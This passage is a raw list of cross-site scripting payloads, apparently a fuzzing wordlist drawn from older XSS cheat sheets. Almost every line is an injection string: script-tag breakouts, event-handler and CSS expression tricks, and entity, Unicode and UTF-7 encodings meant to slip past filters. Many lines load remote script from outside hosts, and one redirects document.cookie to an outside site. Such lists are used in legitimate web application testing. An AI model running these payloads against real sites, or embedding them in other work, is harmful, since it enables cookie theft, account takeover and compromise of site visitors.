style=a:expression(alert())> +</script><script>alert(1)</script> +"><BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")> +[color=red width=expression(alert(123))][color] +<BASE HREF="javascript:alert('XSS');//"> +Execute(MsgBox(chr(88)&chr(83)&chr(83)))< +"></iframe><script>alert(123)</script> +<body onLoad="while(true) alert('XSS');"> +'"></title><script>alert(1111)</script> +</textarea>'"><script>alert(document.cookie)</script> +'""><script language="JavaScript"> alert('X \nS \nS');</script> +</script></script><<<<script><>>>><<<script>alert(123)</script> +<html><noalert><noscript>(123)</noscript><script>(123)</script> +<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');"> +'></select><script>alert(123)</script> +'>"><script src = 'http://www.site.com/XSS.js'></script> +}</style><script>a=eval;b=alert;a(b(/XSS/.source));</script> +<SCRIPT>document.write("XSS");</SCRIPT> +a="get";b="URL";c="javascript:";d="alert('xss');";eval(a+b+c+d); +='><script>alert("xss")</script> +<script+src=">"+src="http://yoursite.com/xss.js?69,69"></script> +<body 
background=javascript:'"><script>alert(navigator.userAgent)</script>></body> +">/XaDoS/><script>alert(document.cookie)</script><script src="http://www.site.com/XSS.js"></script> +">/KinG-InFeT.NeT/><script>alert(document.cookie)</script> +src="http://www.site.com/XSS.js"></script> +data:text/html;charset=utf-7;base64,Ij48L3RpdGxlPjxzY3JpcHQ+YWxlcnQoMTMzNyk8L3NjcmlwdD4= +!--" /><script>alert('xss');</script> +<script>alert("XSS by \nxss")</script><marquee><h1>XSS by xss</h1></marquee> +"><script>alert("XSS by \nxss")</script>><marquee><h1>XSS by xss</h1></marquee> +'"></title><script>alert("XSS by \nxss")</script>><marquee><h1>XSS by xss</h1></marquee> +<img """><script>alert("XSS by \nxss")</script><marquee><h1>XSS by xss</h1></marquee> +<script>alert(1337)</script><marquee><h1>XSS by xss</h1></marquee> +"><script>alert(1337)</script>"><script>alert("XSS by \nxss</h1></marquee> +'"></title><script>alert(1337)</script>><marquee><h1>XSS by xss</h1></marquee> +<iframe src="javascript:alert('XSS by \nxss');"></iframe><marquee><h1>XSS by xss</h1></marquee> +'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT><img src="" alt=' +"><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT><img src="" alt=" +\'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT><img src="" alt=\' +http://www.simpatie.ro/index.php?page=friends&member=781339&javafunctionname=Pageclick&javapgno=2 javapgno=2 ??XSS?? +http://www.simpatie.ro/index.php?page=top_movies&cat=13&p=2 p=2 ??XSS?? 
+'); alert('xss'); var x=' +\\'); alert(\'xss\');var x=\' +//--></SCRIPT><SCRIPT>alert(String.fromCharCode(88,83,83)); +>"><ScRiPt%20%0a%0d>alert(561177485777)%3B</ScRiPt> +<img src="Mario Heiderich says that svg SHOULD not be executed trough image tags" onerror="javascript:document.write('\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u0020\u0073\u0072\u0063\u003d\u0022\u0064\u0061\u0074\u0061\u003a\u0069\u006d\u0061\u0067\u0065\u002f\u0073\u0076\u0067\u002b\u0078\u006d\u006c\u003b\u0062\u0061\u0073\u0065\u0036\u0034\u002c\u0050\u0048\u004e\u0032\u005a\u0079\u0042\u0034\u0062\u0057\u0078\u0075\u0063\u007a\u0030\u0069\u0061\u0048\u0052\u0030\u0063\u0044\u006f\u0076\u004c\u0033\u0064\u0033\u0064\u0079\u0035\u0033\u004d\u0079\u0035\u0076\u0063\u006d\u0063\u0076\u004d\u006a\u0041\u0077\u004d\u0043\u0039\u007a\u0064\u006d\u0063\u0069\u0050\u0069\u0041\u0067\u0043\u0069\u0041\u0067\u0049\u0044\u0078\u0070\u0062\u0057\u0046\u006e\u005a\u0053\u0042\u0076\u0062\u006d\u0078\u0076\u0059\u0057\u0051\u0039\u0049\u006d\u0046\u0073\u005a\u0058\u004a\u0030\u004b\u0044\u0045\u0070\u0049\u006a\u0034\u0038\u004c\u0032\u006c\u0074\u0059\u0057\u0064\u006c\u0050\u0069\u0041\u0067\u0043\u0069\u0041\u0067\u0049\u0044\u0078\u007a\u0064\u006d\u0063\u0067\u0062\u0032\u0035\u0073\u0062\u0032\u0046\u006b\u0050\u0053\u004a\u0068\u0062\u0047\u0056\u0079\u0064\u0043\u0067\u0079\u004b\u0053\u0049\u002b\u0050\u0043\u0039\u007a\u0064\u006d\u0063\u002b\u0049\u0043\u0041\u004b\u0049\u0043\u0041\u0067\u0050\u0048\u004e\u006a\u0063\u006d\u006c\u0077\u0064\u0044\u0035\u0068\u0062\u0047\u0056\u0079\u0064\u0043\u0067\u007a\u004b\u0054\u0077\u0076\u0063\u0032\u004e\u0079\u0061\u0058\u0042\u0030\u0050\u0069\u0041\u0067\u0043\u0069\u0041\u0067\u0049\u0044\u0078\u006b\u005a\u0057\u005a\u007a\u0049\u0047\u0039\u0075\u0062\u0047\u0039\u0068\u005a\u0044\u0030\u0069\u0059\u0057\u0078\u006c\u0063\u006e\u0051\u006f\u004e\u0043\u006b\u0069\u0050\u006a\u0077\u0076\u005a\u0047\u0056\u006d\u0063\u007a\u0034\u0067\u0049\u004
1\u006f\u0067\u0049\u0043\u0041\u0038\u005a\u0079\u0042\u0076\u0062\u006d\u0078\u0076\u0059\u0057\u0051\u0039\u0049\u006d\u0046\u0073\u005a\u0058\u004a\u0030\u004b\u0044\u0055\u0070\u0049\u006a\u0034\u0067\u0049\u0041\u006f\u0067\u0049\u0043\u0041\u0067\u0049\u0043\u0041\u0067\u0050\u0047\u004e\u0070\u0063\u006d\u004e\u0073\u005a\u0053\u0042\u0076\u0062\u006d\u0078\u0076\u0059\u0057\u0051\u0039\u0049\u006d\u0046\u0073\u005a\u0058\u004a\u0030\u004b\u0044\u0059\u0070\u0049\u0069\u0041\u0076\u0050\u0069\u0041\u0067\u0043\u0069\u0041\u0067\u0049\u0043\u0041\u0067\u0049\u0043\u0041\u0038\u0064\u0047\u0056\u0034\u0064\u0043\u0042\u0076\u0062\u006d\u0078\u0076\u0059\u0057\u0051\u0039\u0049\u006d\u0046\u0073\u005a\u0058\u004a\u0030\u004b\u0044\u0063\u0070\u0049\u006a\u0034\u0038\u004c\u0033\u0052\u006c\u0065\u0048\u0051\u002b\u0049\u0043\u0041\u004b\u0049\u0043\u0041\u0067\u0050\u0043\u0039\u006e\u0050\u0069\u0041\u0067\u0043\u006a\u0077\u0076\u0063\u0033\u005a\u006e\u0050\u0069\u0041\u0067\u0022\u003e\u003c\u002f\u0069\u0066\u0072\u0061\u006d\u0065\u003e');"></img> +</body> +</html> +<SCRIPT SRC=http://hacker-site.com/xss.js></SCRIPT> +<SCRIPT> alert(“XSS”); </SCRIPT> +<BODY ONLOAD=alert("XSS")> +<BODY BACKGROUND="javascript:alert('XSS')"> +<IMG SRC="javascript:alert('XSS');"> +<IMG DYNSRC="javascript:alert('XSS')"> +<IMG LOWSRC="javascript:alert('XSS')"> +<IFRAME SRC=”http://hacker-site.com/xss.html”> +<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');"> +<LINK REL="stylesheet" HREF="javascript:alert('XSS');"> +<TABLE BACKGROUND="javascript:alert('XSS')"> +<TD BACKGROUND="javascript:alert('XSS')"> +<DIV STYLE="background-image: url(javascript:alert('XSS'))"> +<DIV STYLE="width: expression(alert('XSS'));"> +<OBJECT TYPE="text/x-scriptlet" DATA="http://hacker.com/xss.html"> +<EMBED SRC="http://hacker.com/xss.swf" AllowScriptAccess="always"> 
+&apos;;alert(String.fromCharCode(88,83,83))//\&apos;;alert(String.fromCharCode(88,83,83))//&quot;;alert(String.fromCharCode(88,83,83))//\&quot;;alert(String.fromCharCode(88,83,83))//--&gt;&lt;/SCRIPT&gt;&quot;&gt;&apos;&gt;&lt;SCRIPT&gt;alert(String.fromCharCode(88,83,83))&lt;/SCRIPT&gt; +&apos;&apos;;!--&quot;&lt;XSS&gt;=&amp;{()} +&lt;SCRIPT&gt;alert(&apos;XSS&apos;)&lt;/SCRIPT&gt; +&lt;SCRIPT SRC=http://ha.ckers.org/xss.js&gt;&lt;/SCRIPT&gt; +&lt;SCRIPT&gt;alert(String.fromCharCode(88,83,83))&lt;/SCRIPT&gt; +&lt;BASE HREF=&quot;javascript:alert(&apos;XSS&apos;);//&quot;&gt; +&lt;BGSOUND SRC=&quot;javascript:alert(&apos;XSS&apos;);&quot;&gt; +&lt;BODY BACKGROUND=&quot;javascript:alert(&apos;XSS&apos;);&quot;&gt; +&lt;BODY ONLOAD=alert(&apos;XSS&apos;)&gt; +&lt;DIV STYLE=&quot;background-image: url(javascript:alert(&apos;XSS&apos;))&quot;&gt; +&lt;DIV STYLE=&quot;background-image: url(&amp;#1;javascript:alert(&apos;XSS&apos;))&quot;&gt; +&lt;DIV STYLE=&quot;width: expression(alert(&apos;XSS&apos;));&quot;&gt; +&lt;FRAMESET&gt;&lt;FRAME SRC=&quot;javascript:alert(&apos;XSS&apos;);&quot;&gt;&lt;/FRAMESET&gt; +&lt;IFRAME SRC=&quot;javascript:alert(&apos;XSS&apos;);&quot;&gt;&lt;/IFRAME&gt; +&lt;INPUT TYPE=&quot;IMAGE&quot; SRC=&quot;javascript:alert(&apos;XSS&apos;);&quot;&gt; +&lt;IMG SRC=&quot;javascript:alert(&apos;XSS&apos;);&quot;&gt; +&lt;IMG SRC=javascript:alert(&apos;XSS&apos;)&gt; +&lt;IMG DYNSRC=&quot;javascript:alert(&apos;XSS&apos;);&quot;&gt; +&lt;IMG LOWSRC=&quot;javascript:alert(&apos;XSS&apos;);&quot;&gt; +&lt;IMG SRC=&quot;http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode&quot;&gt; +Redirect 302 /a.jpg http://victimsite.com/admin.asp&amp;deleteuser +exp/*&lt;XSS STYLE=&apos;no\xss:noxss(&quot;*//*&quot;); +&lt;STYLE&gt;li {list-style-image: url(&quot;javascript:alert(&#39;XSS&#39;)&quot;);}&lt;/STYLE&gt;&lt;UL&gt;&lt;LI&gt;XSS +&lt;IMG SRC=&apos;vbscript:msgbox(&quot;XSS&quot;)&apos;&gt; +&lt;LAYER 
SRC=&quot;http://ha.ckers.org/scriptlet.html&quot;&gt;&lt;/LAYER&gt; +&lt;IMG SRC=&quot;livescript:[code]&quot;&gt; +%BCscript%BEalert(%A2XSS%A2)%BC/script%BE +&lt;META HTTP-EQUIV=&quot;refresh&quot; CONTENT=&quot;0;url=javascript:alert(&apos;XSS&apos;);&quot;&gt; +&lt;META HTTP-EQUIV=&quot;refresh&quot; CONTENT=&quot;0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K&quot;&gt; +&lt;META HTTP-EQUIV=&quot;refresh&quot; CONTENT=&quot;0; URL=http://;URL=javascript:alert(&apos;XSS&apos;);&quot;&gt; +&lt;IMG SRC=&quot;mocha:[code]&quot;&gt; +&lt;OBJECT TYPE=&quot;text/x-scriptlet&quot; DATA=&quot;http://ha.ckers.org/scriptlet.html&quot;&gt;&lt;/OBJECT&gt; +&lt;OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389&gt;&lt;param name=url value=javascript:alert(&apos;XSS&apos;)&gt;&lt;/OBJECT&gt; +&lt;EMBED SRC=&quot;http://ha.ckers.org/xss.swf&quot; AllowScriptAccess=&quot;always&quot;&gt;&lt;/EMBED&gt; +a=&quot;get&quot;;&amp;#10;b=&quot;URL(&quot;&quot;;&amp;#10;c=&quot;javascript:&quot;;&amp;#10;d=&quot;alert(&apos;XSS&apos;);&quot;)&quot;;&#10;eval(a+b+c+d); +&lt;STYLE TYPE=&quot;text/javascript&quot;&gt;alert(&apos;XSS&apos;);&lt;/STYLE&gt; +&lt;IMG STYLE=&quot;xss:expr/*XSS*/ession(alert(&apos;XSS&apos;))&quot;&gt; +&lt;XSS STYLE=&quot;xss:expression(alert(&apos;XSS&apos;))&quot;&gt; +&lt;STYLE&gt;.XSS{background-image:url(&quot;javascript:alert(&apos;XSS&apos;)&quot;);}&lt;/STYLE&gt;&lt;A CLASS=XSS&gt;&lt;/A&gt; +&lt;STYLE type=&quot;text/css&quot;&gt;BODY{background:url(&quot;javascript:alert(&apos;XSS&apos;)&quot;)}&lt;/STYLE&gt; +&lt;LINK REL=&quot;stylesheet&quot; HREF=&quot;javascript:alert(&apos;XSS&apos;);&quot;&gt; +&lt;LINK REL=&quot;stylesheet&quot; HREF=&quot;http://ha.ckers.org/xss.css&quot;&gt; +&lt;STYLE&gt;@import&apos;http://ha.ckers.org/xss.css&apos;;&lt;/STYLE&gt; +&lt;META HTTP-EQUIV=&quot;Link&quot; Content=&quot;&lt;http://ha.ckers.org/xss.css&gt;; REL=stylesheet&quot;&gt; 
+&lt;STYLE&gt;BODY{-moz-binding:url(&quot;http://ha.ckers.org/xssmoz.xml#xss&quot;)}&lt;/STYLE&gt; +&lt;TABLE BACKGROUND=&quot;javascript:alert(&apos;XSS&apos;)&quot;&gt;&lt;/TABLE&gt; +&lt;TABLE&gt;&lt;TD BACKGROUND=&quot;javascript:alert(&apos;XSS&apos;)&quot;&gt;&lt;/TD&gt;&lt;/TABLE&gt; +&lt;HTML xmlns:xss&gt; +&lt;XML ID=I&gt;&lt;X&gt;&lt;C&gt;&lt;![CDATA[&lt;IMG SRC=&quot;javas]]&gt;&lt;![CDATA[cript:alert(&apos;XSS&apos;);&quot;&gt;]]&gt; +&lt;XML ID=&quot;xss&quot;&gt;&lt;I&gt;&lt;B&gt;&lt;IMG SRC=&quot;javas&lt;!-- --&gt;cript:alert(&apos;XSS&apos;)&quot;&gt;&lt;/B&gt;&lt;/I&gt;&lt;/XML&gt; +&lt;XML SRC=&quot;http://ha.ckers.org/xsstest.xml&quot; ID=I&gt;&lt;/XML&gt; +&lt;HTML&gt;&lt;BODY&gt; +&lt;!--[if gte IE 4]&gt; +&lt;META HTTP-EQUIV=&quot;Set-Cookie&quot; Content=&quot;USERID=&lt;SCRIPT&gt;alert(&apos;XSS&apos;)&lt;/SCRIPT&gt;&quot;&gt; +&lt;XSS STYLE=&quot;behavior: url(http://ha.ckers.org/xss.htc);&quot;&gt; +&lt;SCRIPT SRC=&quot;http://ha.ckers.org/xss.jpg&quot;&gt;&lt;/SCRIPT&gt; +&lt;!--#exec cmd=&quot;/bin/echo &apos;&lt;SCRIPT SRC&apos;&quot;--&gt;&lt;!--#exec cmd=&quot;/bin/echo &apos;=http://ha.ckers.org/xss.js&gt;&lt;/SCRIPT&gt;&apos;&quot;--&gt; +&lt;? 
echo(&apos;&lt;SCR)&apos;; +&lt;BR SIZE=&quot;&amp;{alert(&apos;XSS&apos;)}&quot;&gt; +&lt;IMG SRC=JaVaScRiPt:alert(&apos;XSS&apos;)&gt; +&lt;IMG SRC=javascript:alert(&amp;quot;XSS&amp;quot;)&gt; +&lt;IMG SRC=`javascript:alert(&quot;RSnake says, &apos;XSS&apos;&quot;)`&gt; +&lt;IMG SRC=javascript:alert(String.fromCharCode(88,83,83))&gt; +&lt;IMG SRC=&amp;#106;&amp;#97;&amp;#118;&amp;#97;&amp;#115;&amp;#99;&amp;#114;&amp;#105;&amp;#112;&amp;#116;&amp;#58;&amp;#97;&amp;#108;&amp;#101;&amp;#114;&amp;#116;&amp;#40;&amp;#39;&amp;#88;&amp;#83;&amp;#83;&amp;#39;&amp;#41;&gt; +&lt;IMG SRC=&amp;#0000106&amp;#0000097&amp;#0000118&amp;#0000097&amp;#0000115&amp;#0000099&amp;#0000114&amp;#0000105&amp;#0000112&amp;#0000116&amp;#0000058&amp;#0000097&amp;#0000108&amp;#0000101&amp;#0000114&amp;#0000116&amp;#0000040&amp;#0000039&amp;#0000088&amp;#0000083&amp;#0000083&amp;#0000039&amp;#0000041&gt; +&lt;DIV STYLE=&quot;background-image:\0075\0072\006C\0028&apos;\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029&apos;\0029&quot;&gt; +&lt;IMG SRC=&amp;#x6A&amp;#x61&amp;#x76&amp;#x61&amp;#x73&amp;#x63&amp;#x72&amp;#x69&amp;#x70&amp;#x74&amp;#x3A&amp;#x61&amp;#x6C&amp;#x65&amp;#x72&amp;#x74&amp;#x28&amp;#x27&amp;#x58&amp;#x53&amp;#x53&amp;#x27&amp;#x29&gt; +&lt;HEAD&gt;&lt;META HTTP-EQUIV=&quot;CONTENT-TYPE&quot; CONTENT=&quot;text/html; charset=UTF-7&quot;&gt; &lt;/HEAD&gt;+ADw-SCRIPT+AD4-alert(&apos;XSS&apos;);+ADw-/SCRIPT+AD4- +\&quot;;alert(&apos;XSS&apos;);// +&lt;/TITLE&gt;&lt;SCRIPT&gt;alert("XSS");&lt;/SCRIPT&gt; +&lt;STYLE&gt;@im\port&apos;\ja\vasc\ript:alert(&quot;XSS&quot;)&apos;;&lt;/STYLE&gt; +&lt;IMG SRC=&quot;jav&#x09;ascript:alert(&apos;XSS&apos;);&quot;&gt; +&lt;IMG SRC=&quot;jav&amp;#x09;ascript:alert(&apos;XSS&apos;);&quot;&gt; +&lt;IMG SRC=&quot;jav&amp;#x0A;ascript:alert(&apos;XSS&apos;);&quot;&gt; +&lt;IMG SRC=&quot;jav&amp;#x0D;ascript:alert(&apos;XSS&apos;);&quot;&gt; 
+&lt;IMG&#x0D;SRC&#x0D;=&#x0D;&quot;&#x0D;j&#x0D;a&#x0D;v&#x0D;a&#x0D;s&#x0D;c&#x0D;r&#x0D;i&#x0D;p&#x0D;t&#x0D;:&#x0D;a&#x0D;l&#x0D;e&#x0D;r&#x0D;t&#x0D;(&#x0D;&apos;&#x0D;X&#x0D;S&#x0D;S&#x0D;&apos;&#x0D;)&#x0D;&quot;&#x0D;&gt;&#x0D; +perl -e &apos;print &quot;&lt;IMG SRC=java\0script:alert(&quot;XSS&quot;)>&quot;;&apos;&gt; out +perl -e &apos;print &quot;&amp;&lt;SCR\0IPT&gt;alert(&quot;XSS&quot;)&lt;/SCR\0IPT&gt;&quot;;&apos; &gt; out +&lt;IMG SRC=&quot; &amp;#14; javascript:alert(&apos;XSS&apos;);&quot;&gt; +&lt;SCRIPT/XSS SRC=&quot;http://ha.ckers.org/xss.js&quot;&gt;&lt;/SCRIPT&gt; +&lt;BODY onload!#$%&amp;()*~+-_.,:;?@[/|\]^`=alert(&quot;XSS&quot;)&gt; +&lt;SCRIPT SRC=http://ha.ckers.org/xss.js +&lt;SCRIPT SRC=//ha.ckers.org/.j&gt; +&lt;IMG SRC=&quot;javascript:alert(&apos;XSS&apos;)&quot; +&lt;IFRAME SRC=http://ha.ckers.org/scriptlet.html &lt; +&lt;&lt;SCRIPT&gt;alert(&quot;XSS&quot;);//&lt;&lt;/SCRIPT&gt; +&lt;IMG &quot;&quot;&quot;&gt;&lt;SCRIPT&gt;alert(&quot;XSS&quot;)&lt;/SCRIPT&gt;&quot;&gt; +&lt;SCRIPT&gt;a=/XSS/ +&lt;SCRIPT a=&quot;&gt;&quot; SRC=&quot;http://ha.ckers.org/xss.js&quot;&gt;&lt;/SCRIPT&gt; +&lt;SCRIPT =&quot;blah&quot; SRC=&quot;http://ha.ckers.org/xss.js&quot;&gt;&lt;/SCRIPT&gt; +&lt;SCRIPT a=&quot;blah&quot; &apos;&apos; SRC=&quot;http://ha.ckers.org/xss.js&quot;&gt;&lt;/SCRIPT&gt; +&lt;SCRIPT &quot;a=&apos;&gt;&apos;&quot; SRC=&quot;http://ha.ckers.org/xss.js&quot;&gt;&lt;/SCRIPT&gt; +&lt;SCRIPT a=`&gt;` SRC=&quot;http://ha.ckers.org/xss.js&quot;&gt;&lt;/SCRIPT&gt; +&lt;SCRIPT&gt;document.write(&quot;&lt;SCRI&quot;);&lt;/SCRIPT&gt;PT SRC=&quot;http://ha.ckers.org/xss.js&quot;&gt;&lt;/SCRIPT&gt; +&lt;SCRIPT a=&quot;>&apos;>&quot; SRC=&quot;http://ha.ckers.org/xss.js&quot;&gt;&lt;/SCRIPT&gt; +&lt;A HREF=&quot;http://66.102.7.147/&quot;&gt;XSS&lt;/A&gt; +&lt;A HREF=&quot;http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D&quot;&gt;XSS&lt;/A&gt; +&lt;A HREF=&quot;http://1113982867/&quot;&gt;XSS&lt;/A&gt; +&lt;A 
HREF=&quot;http://0x42.0x0000066.0x7.0x93/&quot;&gt;XSS&lt;/A&gt; +&lt;A HREF=&quot;http://0102.0146.0007.00000223/&quot;&gt;XSS&lt;/A&gt; +&lt;A HREF=&quot;h&#x0A;tt&#09;p://6&amp;#09;6.000146.0x7.147/&quot;&gt;XSS&lt;/A&gt; +&lt;A HREF=&quot;//www.google.com/&quot;&gt;XSS&lt;/A&gt; +&lt;A HREF=&quot;//google&quot;&gt;XSS&lt;/A&gt; +&lt;A HREF=&quot;http://ha.ckers.org@google&quot;&gt;XSS&lt;/A&gt; +&lt;A HREF=&quot;http://google:ha.ckers.org&quot;&gt;XSS&lt;/A&gt; +&lt;A HREF=&quot;http://google.com/&quot;&gt;XSS&lt;/A&gt; +&lt;A HREF=&quot;http://www.google.com./&quot;&gt;XSS&lt;/A&gt; +&lt;A HREF=&quot;javascript:document.location=&apos;http://www.google.com/&apos;&quot;&gt;XSS&lt;/A&gt; +&lt;A HREF=&quot;http://www.gohttp://www.google.com/ogle.com/&quot;&gt;XSS&lt;/A&gt; +<script>document.vulnerable=true;</script> +<img SRC="jav ascript:document.vulnerable=true;"> +<img SRC="javascript:document.vulnerable=true;"> +<img SRC=" &#14; javascript:document.vulnerable=true;"> +<body onload!#$%&()*~+-_.,:;?@[/|\]^`=document.vulnerable=true;> +<<SCRIPT>document.vulnerable=true;//<</SCRIPT> +<script <B>document.vulnerable=true;</script> +<img SRC="javascript:document.vulnerable=true;" +<iframe src="javascript:document.vulnerable=true; < +<script>a=/XSS/\ndocument.vulnerable=true;</script> +\";document.vulnerable=true;;// +</title><SCRIPT>document.vulnerable=true;</script> +<input TYPE="IMAGE" SRC="javascript:document.vulnerable=true;"> +<body BACKGROUND="javascript:document.vulnerable=true;"> +<body ONLOAD=document.vulnerable=true;> +<img DYNSRC="javascript:document.vulnerable=true;"> +<img LOWSRC="javascript:document.vulnerable=true;"> +<bgsound SRC="javascript:document.vulnerable=true;"> +<br SIZE="&{document.vulnerable=true}"> +<LAYER SRC="javascript:document.vulnerable=true;"></LAYER> +<link REL="stylesheet" HREF="javascript:document.vulnerable=true;"> +<style>li {list-style-image: url("javascript:document.vulnerable=true;");</STYLE><UL><LI>XSS +<img 
SRC='vbscript:document.vulnerable=true;'> +1script3document.vulnerable=true;1/script3 +<meta HTTP-EQUIV="refresh" CONTENT="0;url=javascript:document.vulnerable=true;"> +<meta HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:document.vulnerable=true;"> +<IFRAME SRC="javascript:document.vulnerable=true;"></iframe> +<FRAMESET><FRAME SRC="javascript:document.vulnerable=true;"></frameset> +<table BACKGROUND="javascript:document.vulnerable=true;"> +<table><TD BACKGROUND="javascript:document.vulnerable=true;"> +<div STYLE="background-image: url(javascript:document.vulnerable=true;)"> +<div STYLE="background-image: url(&#1;javascript:document.vulnerable=true;)"> +<div STYLE="width: expression(document.vulnerable=true);"> +<style>@im\port'\ja\vasc\ript:document.vulnerable=true';</style> +<img STYLE="xss:expr/*XSS*/ession(document.vulnerable=true)"> +<XSS STYLE="xss:expression(document.vulnerable=true)"> +exp/*<A STYLE='no\xss:noxss("*//*");xss:ex/*XSS*//*/*/pression(document.vulnerable=true)'> +<style TYPE="text/javascript">document.vulnerable=true;</style> +<style>.XSS{background-image:url("javascript:document.vulnerable=true");}</STYLE><A CLASS=XSS></a> +<style type="text/css">BODY{background:url("javascript:document.vulnerable=true")}</style> +<!--[if gte IE 4]><SCRIPT>document.vulnerable=true;</SCRIPT><![endif]--> +<base HREF="javascript:document.vulnerable=true;//"> +<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:document.vulnerable=true></object> +<XML ID=I><X><C><![<IMG SRC="javas]]<![cript:document.vulnerable=true;">]]</C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></span> +<XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:document.vulnerable=true"></B></I></XML><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></span> +<html><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS<SCRIPT 
DEFER>document.vulnerable=true</SCRIPT>"></BODY></html> +<? echo('<SCR)';echo('IPT>document.vulnerable=true</SCRIPT>'); ?> +<meta HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>document.vulnerable=true</SCRIPT>"> +<head><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-document.vulnerable=true;+ADw-/SCRIPT+AD4- +<a href="javascript#document.vulnerable=true;"> +<div onmouseover="document.vulnerable=true;"> +<img src="javascript:document.vulnerable=true;"> +<img dynsrc="javascript:document.vulnerable=true;"> +<input type="image" dynsrc="javascript:document.vulnerable=true;"> +<bgsound src="javascript:document.vulnerable=true;"> +&<script>document.vulnerable=true;</script> +&{document.vulnerable=true;}; +<img src=&{document.vulnerable=true;};> +<link rel="stylesheet" href="javascript:document.vulnerable=true;"> +<iframe src="vbscript:document.vulnerable=true;"> +<img src="mocha:document.vulnerable=true;"> +<img src="livescript:document.vulnerable=true;"> +<a href="about:<script>document.vulnerable=true;</script>"> +<meta http-equiv="refresh" content="0;url=javascript:document.vulnerable=true;"> +<body onload="document.vulnerable=true;"> +<div style="background-image: url(javascript:document.vulnerable=true;);"> +<div style="behaviour: url([link to code]);"> +<div style="binding: url([link to code]);"> +<div style="width: expression(document.vulnerable=true;);"> +<style type="text/javascript">document.vulnerable=true;</style> +<object classid="clsid:..." 
codebase="javascript:document.vulnerable=true;"> +<style><!--</style><script>document.vulnerable=true;//--></script> +<<script>document.vulnerable=true;</script> +<![<!--]]<script>document.vulnerable=true;//--></script> +<!-- -- --><script>document.vulnerable=true;</script><!-- -- --> +<img src="blah"onmouseover="document.vulnerable=true;"> +<img src="blah>" onmouseover="document.vulnerable=true;"> +<xml src="javascript:document.vulnerable=true;"> +<xml id="X"><a><b><script>document.vulnerable=true;</script>;</b></a></xml> +<div datafld="b" dataformatas="html" datasrc="#X"></div> +[\xC0][\xBC]script>document.vulnerable=true;[\xC0][\xBC]/script> +<style>@import'http://www.securitycompass.com/xss.css';</style> +<meta HTTP-EQUIV="Link" Content="<http://www.securitycompass.com/xss.css>; REL=stylesheet"> +<style>BODY{-moz-binding:url("http://www.securitycompass.com/xssmoz.xml#xss")}</style> +<OBJECT TYPE="text/x-scriptlet" DATA="http://www.securitycompass.com/scriptlet.html"></object> +<HTML xmlns:xss><?import namespace="xss" implementation="http://www.securitycompass.com/xss.htc"><xss:xss>XSS</xss:xss></html> +<script SRC="http://www.securitycompass.com/xss.jpg"></script> +<!--#exec cmd="/bin/echo '<SCR'"--><!--#exec cmd="/bin/echo 'IPT SRC=http://www.securitycompass.com/xss.js></SCRIPT>'"--> +<script a=">" SRC="http://www.securitycompass.com/xss.js"></script> +<script =">" SRC="http://www.securitycompass.com/xss.js"></script> +<script a=">" '' SRC="http://www.securitycompass.com/xss.js"></script> +<script "a='>'" SRC="http://www.securitycompass.com/xss.js"></script> +<script a=`>` SRC="http://www.securitycompass.com/xss.js"></script> +<script a=">'>" SRC="http://www.securitycompass.com/xss.js"></script> +<script>document.write("<SCRI");</SCRIPT>PT SRC="http://www.securitycompass.com/xss.js"></script> +<div style="binding: url(http://www.securitycompass.com/xss.js);"> [Mozilla] +&quot;&gt;&lt;BODY onload!#$%&amp;()*~+-_.,:;?@[/|\]^`=alert(&quot;XSS&quot;)&gt; 
+&lt;/script&gt;&lt;script&gt;alert(1)&lt;/script&gt; +&lt;/br style=a:expression(alert())&gt; +&lt;scrscriptipt&gt;alert(1)&lt;/scrscriptipt&gt; +&lt;br size=\&quot;&amp;{alert(&#039;XSS&#039;)}\&quot;&gt; +perl -e &#039;print \&quot;&lt;IMG SRC=java\0script:alert(\&quot;XSS\&quot;)&gt;\&quot;;&#039; &gt; out +perl -e &#039;print \&quot;&lt;SCR\0IPT&gt;alert(\&quot;XSS\&quot;)&lt;/SCR\0IPT&gt;\&quot;;&#039; &gt; out +<~/XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))> +<~/XSS/*-*/STYLE=xss:e/**/xpression(window.location="http://www.procheckup.com/?sid="%2bdocument.cookie)> +<~/XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))> +<~/XSS STYLE=xss:expression(alert('XSS'))> +"><script>alert('XSS')</script> +</XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))> +XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))> +XSS STYLE=xss:e/**/xpression(alert('XSS'))> +</XSS STYLE=xss:expression(alert('XSS'))> +';;alert(String.fromCharCode(88,83,83))//\';;alert(String.fromCharCode(88,83,83))//";;alert(String.fromCharCode(88,83,83))//\";;alert(String.fromCharCode(88,83,83))//-->;<;/SCRIPT>;";>;';>;<;SCRIPT>;alert(String.fromCharCode(88,83,83))<;/SCRIPT>; +';';;!--";<;XSS>;=&;{()} +<;SCRIPT>;alert(';XSS';)<;/SCRIPT>; +<;SCRIPT SRC=http://ha.ckers.org/xss.js>;<;/SCRIPT>; +<;SCRIPT>;alert(String.fromCharCode(88,83,83))<;/SCRIPT>; +<;BASE HREF=";javascript:alert(';XSS';);//";>; +<;BGSOUND 